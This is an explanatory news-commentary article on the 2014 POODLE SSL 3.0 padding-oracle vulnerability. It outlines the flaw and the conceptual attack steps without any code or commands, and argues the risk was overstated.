POODLE is the latest in long line of security panics that have hit the headlines in 2014. Once the reserve of specialist publications, vulnerabilities now routinely make their way into the mainstream media, often shorn of nuance and context. There’s no doubt that Heartbleed and Shellshock were critically serious vulnerabilities and both were relatively easy to exploit, but can the same be said of POODLE.
POODLE, a silly name derived from a tenuous acronym (Padding Oracle On Downgraded Legacy Encryption), in theory allows for an attacker to view the plaintext content of a supposedly secure SSL connection.
It relies on two flaws, one in the implementation of SSL 3.0 and one in the way browsers handle SSL negotiations.
SSL 3.0 using the cipher block chaining algorithm pads the final block of its input with extra bytes because it works with blocks of a fixed length. It is possible for an attacker to manipulate the encryption and decryption process and influence what appears in the padding bytes, and, because of the way the server reacts to the contents of the padding, the attacker is able to discover its contents. If you want to understand the full details take a look at this StackExchange article.
All of which would be fine and well if browsers didn’t use what has long been known to be a flawed encryption method. Unfortunately, in an effort to accommodate servers that should have long ago been updated, browsers will attempt to use a more modern version of SSL, but will allow an older version to be used if that’s all the server supports. It’s not difficult to trick a browser into using a lesser protocol with a man-in-the-middle attack, so the attacker simply has to force the browser to use the vulnerable SSL 3.0 and they can read the contents of the connection.
Except it isn’t that easy. To use POODLE in the wild the attacker needs to:
- Trick a user into connecting to a rogue WiFi
- Modify the communication coming from the server to the browser to trick it into using SSL 3.0.
- Inject code into the browser that will cause it to send crafted data that leverages the padding vulnerability.
- Repeat several hundred times (at least) because each request can only reveal one byte of the required information (usually an authentication cookie)
In conclusion, POODLE is a theoretical vulnerability, worked out from a protocol weakness rather than observed in the wild, and it is unlikely to result in real life exploits.